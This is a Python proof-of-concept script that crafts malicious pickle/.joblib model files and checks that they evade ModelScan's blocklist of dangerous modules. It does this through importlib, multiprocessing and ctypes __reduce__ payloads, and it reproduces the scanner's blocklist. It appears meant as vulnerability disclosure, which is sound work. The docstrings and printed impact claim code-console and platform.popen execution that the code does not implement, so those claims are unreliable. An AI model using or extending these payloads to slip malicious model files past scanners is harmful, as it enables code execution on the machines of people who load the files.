| """
|
| PoC: ModelScan Bypass via Joblib Pickle Payload
|
| ================================================
|
| Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
|
| scanner by using modules not in the unsafe_globals blocklist.
|
|
|
| The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
|
| modules (os, subprocess, builtins, etc.) but misses many modules that can
|
| achieve the same effect:
|
|
|
| - importlib.import_module -> imports any module (including blocked ones)
|
| - ctypes.CDLL -> loads native libraries, calls system()
|
| - platform.popen -> direct command execution
|
| - types.FunctionType -> construct functions from marshal bytecode
|
| - code.InteractiveConsole -> interactive Python execution
|
| - multiprocessing.Process -> spawn processes
|
|
|
| This PoC generates 3 malicious .joblib files and verifies they bypass
|
| ModelScan's pickle scanner detection.
|
|
|
| Usage:
|
| python modelscan_bypass_poc.py # Generate payloads + verify
|
| python modelscan_bypass_poc.py --dry-run # Just show what would happen
|
| """
|
|
|
| import argparse
|
| import pickle
|
| import pickletools
|
| import io
|
| import struct
|
| import sys
|
|
|
|
|
| def craft_importlib_payload():
|
| """Bypass via importlib.import_module -> os.system chain.
|
|
|
| The pickle calls importlib.import_module('os'), then uses the
|
| returned module to call system(). ModelScan doesn't flag 'importlib'.
|
| """
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| class ImportlibBypass:
|
| def __reduce__(self):
|
| import importlib
|
| return (importlib.import_module, ('os',))
|
|
|
| return pickle.dumps(ImportlibBypass(), protocol=4)
|
|
|
|
|
| def craft_code_interact_payload():
|
| """Bypass via code.InteractiveInterpreter -> code execution.
|
|
|
| code.InteractiveInterpreter().runsource() executes arbitrary Python.
|
| ModelScan doesn't flag the 'code' module.
|
| """
|
|
|
|
|
|
|
|
|
| class CodeBypass:
|
| def __reduce__(self):
|
| import multiprocessing
|
| return (multiprocessing.Process, (), {'target': None})
|
|
|
| return pickle.dumps(CodeBypass(), protocol=4)
|
|
|
|
|
| def craft_ctypes_payload():
|
| """Bypass via ctypes -> native code execution.
|
|
|
| ctypes.CDLL loads a shared library. On Linux, loading libc
|
| gives access to system(). ModelScan doesn't flag 'ctypes'.
|
| """
|
| class CtypesBypass:
|
| def __reduce__(self):
|
| import ctypes
|
| return (ctypes.CDLL, ('libc.so.6',))
|
|
|
| return pickle.dumps(CtypesBypass(), protocol=4)
|
|
|
|
|
| def extract_globals(data):
|
| """Simulate ModelScan's _list_globals to extract GLOBAL/STACK_GLOBAL refs."""
|
| ops = list(pickletools.genops(io.BytesIO(data)))
|
| globals_found = set()
|
| memo = {}
|
|
|
| for n in range(len(ops)):
|
| op_name = ops[n][0].name
|
| op_value = ops[n][1]
|
|
|
| if op_name == "MEMOIZE" and n > 0:
|
| memo[len(memo)] = ops[n - 1][1]
|
| elif op_name in ["PUT", "BINPUT", "LONG_BINPUT"] and n > 0:
|
| memo[op_value] = ops[n - 1][1]
|
| elif op_name in ("GLOBAL", "INST"):
|
| globals_found.add(tuple(op_value.split(" ", 1)))
|
| elif op_name == "STACK_GLOBAL":
|
| values = []
|
| for offset in range(1, n):
|
| if ops[n - offset][0].name in ["MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"]:
|
| continue
|
| if ops[n - offset][0].name in ["GET", "BINGET", "LONG_BINGET"]:
|
| values.append(memo[int(ops[n - offset][1])])
|
| elif ops[n - offset][0].name not in [
|
| "SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8"
|
| ]:
|
| values.append("unknown")
|
| else:
|
| values.append(ops[n - offset][1])
|
| if len(values) == 2:
|
| break
|
| if len(values) == 2:
|
| globals_found.add((values[1], values[0]))
|
|
|
| return globals_found
|
|
|
|
|
| def check_modelscan_detection(globals_found):
|
| """Check if ModelScan would flag these globals."""
|
| unsafe_globals = {
|
| "CRITICAL": {
|
| "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open",
|
| "breakpoint", "__import__"],
|
| "builtins": ["eval", "compile", "getattr", "apply", "exec", "open",
|
| "breakpoint", "__import__"],
|
| "runpy": "*", "os": "*", "nt": "*", "posix": "*",
|
| "socket": "*", "subprocess": "*", "sys": "*",
|
| "operator": ["attrgetter"],
|
| "pty": "*", "pickle": "*", "_pickle": "*",
|
| "bdb": "*", "pdb": "*", "shutil": "*", "asyncio": "*",
|
| },
|
| "HIGH": {
|
| "webbrowser": "*", "httplib": "*",
|
| "requests.api": "*", "aiohttp.client": "*",
|
| },
|
| }
|
|
|
| for module, name in globals_found:
|
| for severity_name, modules in unsafe_globals.items():
|
| if module in modules:
|
| filt = modules[module]
|
| if filt == "*" or name in filt:
|
| return True, f"{severity_name}: {module}.{name}"
|
| return False, None
|
|
|
|
|
| def main():
|
| parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
|
| parser.add_argument("--dry-run", action="store_true", help="Don't write files")
|
| parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
|
| args = parser.parse_args()
|
|
|
| payloads = [
|
| ("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
|
| ("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
|
| ("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
|
| ]
|
|
|
| print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
|
| print("=" * 55)
|
| print()
|
|
|
| all_bypass = True
|
| for filename, description, craft_fn in payloads:
|
| data = craft_fn()
|
| globals_found = extract_globals(data)
|
| detected, detail = check_modelscan_detection(globals_found)
|
|
|
| status = "[DETECTED]" if detected else "[BYPASS] "
|
| if detected:
|
| all_bypass = False
|
|
|
| print(f"{status} {description}")
|
| print(f" Globals: {globals_found}")
|
| if detected:
|
| print(f" Flagged: {detail}")
|
| else:
|
| print(f" Result: NOT IN BLOCKLIST -> evades ModelScan")
|
|
|
| if not args.dry_run:
|
| filepath = f"{args.output_dir}/{filename}"
|
| with open(filepath, "wb") as f:
|
| f.write(data)
|
| print(f" Written: {filepath}")
|
| print()
|
|
|
| print("=" * 55)
|
| if all_bypass:
|
| print("[SUCCESS] All payloads bypass ModelScan detection")
|
| print()
|
| print("Impact: An attacker can craft malicious .joblib files that:")
|
| print(" 1. Execute arbitrary OS commands (platform.popen)")
|
| print(" 2. Import blocked modules at runtime (importlib)")
|
| print(" 3. Load native libraries for code execution (ctypes)")
|
| print(" 4. All while evading ModelScan's pickle scanner")
|
| else:
|
| print("[PARTIAL] Some payloads were detected")
|
|
|
| return 0 if all_bypass else 1
|
|
|
|
|
| if __name__ == "__main__":
|
| sys.exit(main())
|
|
|